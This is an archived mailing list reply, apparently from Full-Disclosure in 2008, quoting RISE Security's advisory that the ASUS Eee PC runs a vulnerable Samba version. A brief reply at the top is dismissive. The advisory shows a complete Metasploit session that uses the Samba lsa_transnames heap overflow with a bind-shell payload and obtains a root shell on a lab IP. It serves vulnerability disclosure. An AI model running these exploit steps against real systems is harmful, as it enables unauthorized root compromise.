So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight?<br><br><div class="gmail_quote">
On Feb 8, 2008 10:47 AM, RISE Security <<a href="mailto:advisories@risesecurity.org">advisories@risesecurity.org</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
-----BEGIN PGP SIGNED MESSAGE-----<br>Hash: SHA1<br><br>We recently acquired an ASUS Eee PC (if you want to know more about it,<br>a lot of reviews are available on internet). The first thing we did when<br>we put our hands at the ASUS Eee PC was to test its security. The ASUS<br>
Eee PC comes with a customized version of Xandros operating system<br>installed, and some other bundled software like Mozilla Firefox, Pidgin,<br>Skype and OpenOffice.org.<br><br>Analysing the running processes of the ASUS Eee PC, the first thing that<br>
caught our attention was the running smbd process (the sshd daemon was<br>started by us, and is not enabled by default).<br><br><br>eeepc-rise:/root> ps -e<br> PID TTY TIME CMD<br> 1 ? 00:00:00 fastinit<br>
2 ? 00:00:00 ksoftirqd/0<br> 3 ? 00:00:00 events/0<br> 4 ? 00:00:00 khelper<br> 5 ? 00:00:00 kthread<br> 25 ? 00:00:00 kblockd/0<br> 26 ? 00:00:00 kacpid<br> 128 ? 00:00:00 ata/0<br>
129 ? 00:00:00 ata_aux<br> 130 ? 00:00:00 kseriod<br> 148 ? 00:00:00 pdflush<br> 149 ? 00:00:00 pdflush<br> 150 ? 00:00:00 kswapd0<br> 151 ? 00:00:00 aio/0<br> 152 ? 00:00:00 unionfs_siod/0<br>
778 ? 00:00:00 scsi_eh_0<br> 779 ? 00:00:00 scsi_eh_1<br> 799 ? 00:00:00 kpsmoused<br> 819 ? 00:00:00 kjournald<br> 855 ? 00:00:00 fastinit<br> 857 ? 00:00:00 sh<br> 858 ? 00:00:00 su<br>
859 tty3 00:00:00 getty<br> 862 ? 00:00:00 startx<br> 880 ? 00:00:00 xinit<br> 881 tty2 00:00:06 Xorg<br> 890 ? 00:00:00 udevd<br> 952 ? 00:00:00 ksuspend_usbd<br> 953 ? 00:00:00 khubd<br>
1002 ? 00:00:00 acpid<br> 1027 ? 00:00:00 pciehpd_event<br> 1055 ? 00:00:00 ifplugd<br> 1101 ? 00:00:00 scsi_eh_2<br> 1102 ? 00:00:00 usb-storage<br> 1151 ? 00:00:00 icewm<br> 1185 ? 00:00:01 AsusLauncher<br>
1186 ? 00:00:00 icewmtray<br> 1188 ? 00:00:01 powermonitor<br> 1190 ? 00:00:00 minimixer<br> 1191 ? 00:00:00 networkmonitor<br> 1192 ? 00:00:00 wapmonitor<br> 1193 ? 00:00:00 x-session-manag<br>
1195 ? 00:00:00 x-session-manag<br> 1200 ? 00:00:00 x-session-manag<br> 1201 ? 00:00:00 dispwatch<br> 1217 ? 00:00:00 cupsd<br> 1224 ? 00:00:00 usbstorageapple<br> 1234 ? 00:00:00 kondemand/0<br>
1240 ? 00:00:00 portmap<br> 1248 ? 00:00:00 keyboardstatus<br> 1272 ? 00:00:00 memd<br> 1279 ? 00:00:00 scim-helper-man<br> 1280 ? 00:00:00 scim-panel-gtk<br> 1282 ? 00:00:00 scim-launcher<br>
1297 ? 00:00:00 netserv<br> 1331 ? 00:00:00 asusosd<br> 1476 ? 00:00:00 xandrosncs-agen<br> 1775 ? 00:00:00 dhclient3<br> 2002 ? 00:00:00 nmbd<br> 2004 ? 00:00:00 smbd<br> 2005 ? 00:00:00 smbd<br>
2322 ? 00:00:00 sshd<br> 2345 ? 00:00:00 sshd<br> 2356 pts/0 00:00:00 bash<br> 2362 pts/0 00:00:00 ps<br>eeepc-rise:/root><br><br><br>Retrieving the the smbd version, we discovered that it runs a vulnerable<br>
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit<br>we published earlier last year.<br><br><br>eeepc-rise:/root> smbd --version<br>Version 3.0.24<br>eeepc-rise:/root><br><br><br>With this information, we ran our exploit against the ASUS Eee PC using<br>
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is<br>Debian based).<br><br><br>msf > use linux/samba/lsa_transnames_heap<br>msf exploit(lsa_transnames_heap) > set RHOST <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>
RHOST => <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp<br>PAYLOAD => linux/x86/shell_bind_tcp<br>msf exploit(lsa_transnames_heap) > show targets<br>
<br>Exploit targets:<br><br> Id Name<br> -- ----<br> 0 Linux vsyscall<br> 1 Linux Heap Brute Force (Debian/Ubuntu)<br> 2 Linux Heap Brute Force (Gentoo)<br> 3 Linux Heap Brute Force (Mandriva)<br> 4 Linux Heap Brute Force (RHEL/CentOS)<br>
5 Linux Heap Brute Force (SUSE)<br> 6 Linux Heap Brute Force (Slackware)<br> 7 DEBUG<br><br><br>msf exploit(lsa_transnames_heap) > set TARGET 1<br>TARGET => 1<br>msf exploit(lsa_transnames_heap) > exploit<br>
[*] Started bind handler<br>[*] Creating nop sled....<br>...<br>[*] Trying to exploit Samba with address 0x08415000...<br>[*] Connecting to the SMB service...<br>[*] Binding to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>
[*] Bound to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>[*] Calling the vulnerable function...<br>[+] Server did not respond, this is expected<br>[*] Command shell session 1 opened (<a href="http://192.168.50.201:33694" target="_blank">192.168.50.201:33694</a> -><br>
<a href="http://192.168.50.10:4444" target="_blank">192.168.50.10:4444</a>)<br>msf exploit(lsa_transnames_heap) > sessions -i 1<br>[*] Starting interaction with 1...<br><br>uname -a<br>Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686<br>
GNU/Linux<br>id<br>uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)<br><br><br>Easy to learn, Easy to work, Easy to root.<br><br><br>The original blog post and more information can be found in our<br>website at <a href="http://risesecurity.org/" target="_blank">http://risesecurity.org/</a>.<br>
<br>Best regards,<br>RISE Security<br>-----BEGIN PGP SIGNATURE-----<br>Version: GnuPG v1.2.6 (GNU/Linux)<br><br>iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd<br>6tg6XRBCWHfPWFrSdVKu5oA=<br>=OFwe<br>-----END PGP SIGNATURE-----<br>
<br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>